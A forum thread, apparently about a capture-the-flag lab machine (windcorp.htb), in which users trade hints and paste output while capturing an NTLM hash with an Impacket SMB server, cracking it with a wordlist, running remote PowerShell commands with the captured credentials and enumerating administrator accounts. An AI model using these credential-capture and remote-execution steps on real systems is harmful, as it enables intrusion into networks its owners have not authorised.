Posts: 213 Threads: 0 Joined: N/A
September 22, 2022 at 4:54 PM

(September 22, 2022, 02:58 PM) Mr_Unkn0wn Wrote:
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,60902)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] AUTHENTICATE_MESSAGE (WINDCORP\scriptrunner,HOPE)
[*] User HOPE\scriptrunner authenticated successfully
[*] scriptrunner::WINDCORP:a******hash_here*****

Thanks for your hints. Are any specific command line arguments necessary? I tested them all, but I only get this:

[2022-09-22 18:50:53] [*] Incoming connection (192.168.0.2,58633)
[2022-09-22 18:50:53] [-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[2022-09-22 18:50:53] [*] Closing down connection (192.168.0.2,58633)

Posts: 213 Threads: 0 Joined: N/A
September 22, 2022 at 5:34 PM

(September 22, 2022, 05:09 PM) Hacker2222 Wrote:
u use smb2support ?

Yes:

/root/smbserver_linux_x86_64 -smb2support MYSHARE /tmp
Cannot determine Impacket version. If running from source you should at least run "python setup.py egg_info"
Impacket v? - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.0.2,58840)
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] Closing down connection (192.168.0.2,58840)
[*] Remaining connections []

Posts: 213 Threads: 0 Joined: N/A
September 22, 2022 at 5:55 PM

(September 22, 2022, 05:39 PM) Hacker2222 Wrote:
hmm. ..... maybe not use the dev version ? also access share with webserver.windcorp.htb not ip ....

Using \\webserver.windcorp.htb\MYSHARE\ instead of \\webserver\MYSHARE\ did the trick! The hash can be cracked using the rockyou wordlist.

Posts: 78 Threads: 0 Joined: N/A
September 22, 2022 at 9:33 PM

(September 22, 2022, 05:39 PM) Hacker2222 Wrote:
hmm. ..... maybe not use the dev version ? also access share with webserver.windcorp.htb not ip ....

ye, using the non-dev version worked for me. on to the next step, hope this is the final....

Posts: 1 Threads: 0 Joined: N/A
September 22, 2022 at 9:37 PM

Hello My Friends Happy to meet you

Posts: 44 Threads: 0 Joined: N/A
September 22, 2022 at 10:18 PM

you could've also used https://github.com/xct/hashgrab + responder or https://github.com/Plazmaz/LNKUp

This is where I'm right now. Trying to figure out how to connect with creds.

PS C:\> $username = 'HOPE\Bob.Wood'
PS C:\> $passwd = ConvertTo-SecureString "passwdwd" -AsPlainText -Force
PS C:\> $creds = New-Object System.Management.Automation.PSCredential $username, $passwd
PS C:\> Invoke-Command -ComputerName HOPE -Credential $creds -ConfigurationName dc_manage -ScriptBlock {whoami}
[HOPE] Connecting to remote server HOPE failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (HOPE:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken
PS C:\> Invoke-Command -Credential $creds -ConfigurationName dc_manage -ScriptBlock {whoami}
Invoke-Command : Parameter set cannot be resolved using the specified named parameters.
+ Invoke-Command -Credential $creds -ConfigurationName dc_manage -Scrip ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Invoke-Command], ParameterBindingException
    + FullyQualifiedErrorId : AmbiguousParameterSet,Microsoft.PowerShell.Commands.InvokeCommandCommand

tried wmiexec.py as well.. something probably I'm doing wrong..

Posts: 44 Threads: 0 Joined: N/A
September 22, 2022 at 10:40 PM

(September 22, 2022, 10:29 PM) Hacker2222 Wrote:
account is domain username .... domain isn't hope. prob change that

yep.. you're right

PS C:\windows\asd\asd> Invoke-Command -ComputerName HOPE -Credential $creds -ScriptBlock {whoami}
Invoke-Command -ComputerName HOPE -Credential $creds -ScriptBlock {whoami}
windcorp\bob.wood

Posts: 78 Threads: 0 Joined: N/A
September 23, 2022 at 12:58 AM

(September 22, 2022, 09:33 PM) meowmeowattack Wrote:
ye, using the non-dev version worked for me. on to the next step, hope this is the final....

found a password file, could this indicate another round of cracking?
C:\Users\Bob.Wood\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt

Posts: 44 Threads: 0 Joined: N/A
September 24, 2022 at 12:43 AM

Any ideas from bob.wood to admin ? I tried GPO, ACLs, some exploits... winpeas... and nothing yet. Anything?
I think that is a final step. Also interesting

Computer Name : HOPE
User Name : Bob.Wood
User Id : 2761
Is Enabled : True
User Type : User
Comment :
Last Logon : 9/23/2022 3:20:18 AM
Logons Count : 93
Password Last Set : 5/2/2022 12:42:15 PM

Computer Name : HOPE
User Name : bob.woodadm
User Id : 5101
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:43:11 PM

Computer Name : HOPE
User Name : luis.jacksonADM
User Id : 5102
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:44:09 PM

but how to get it..

Posts: 78 Threads: 0 Joined: N/A
September 24, 2022 at 1:02 AM

(September 24, 2022, 12:43 AM) onl1_f4ns Wrote:
Any ideas from bob.wood to admin ? I tried GPO, ACLs, some exploits... winpeas... and nothing yet. Anything?
I think that is a final step. Also interesting

Computer Name : HOPE
User Name : Bob.Wood
User Id : 2761
Is Enabled : True
User Type : User
Comment :
Last Logon : 9/23/2022 3:20:18 AM
Logons Count : 93
Password Last Set : 5/2/2022 12:42:15 PM

Computer Name : HOPE
User Name : bob.woodadm
User Id : 5101
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:43:11 PM

Computer Name : HOPE
User Name : luis.jacksonADM
User Id : 5102
Is Enabled : True
User Type : Administrator
Comment :
Last Logon : 1/1/1970 12:00:00 AM
Logons Count : 0
Password Last Set : 5/4/2022 7:44:09 PM

but how to get it..

same here. after going through the journey so far, i feel this box doesn't really involve any technically difficult barrier, but a lot of things are customised in an unfriendly manner. so i bet it would take some time to find out what's the next customisation.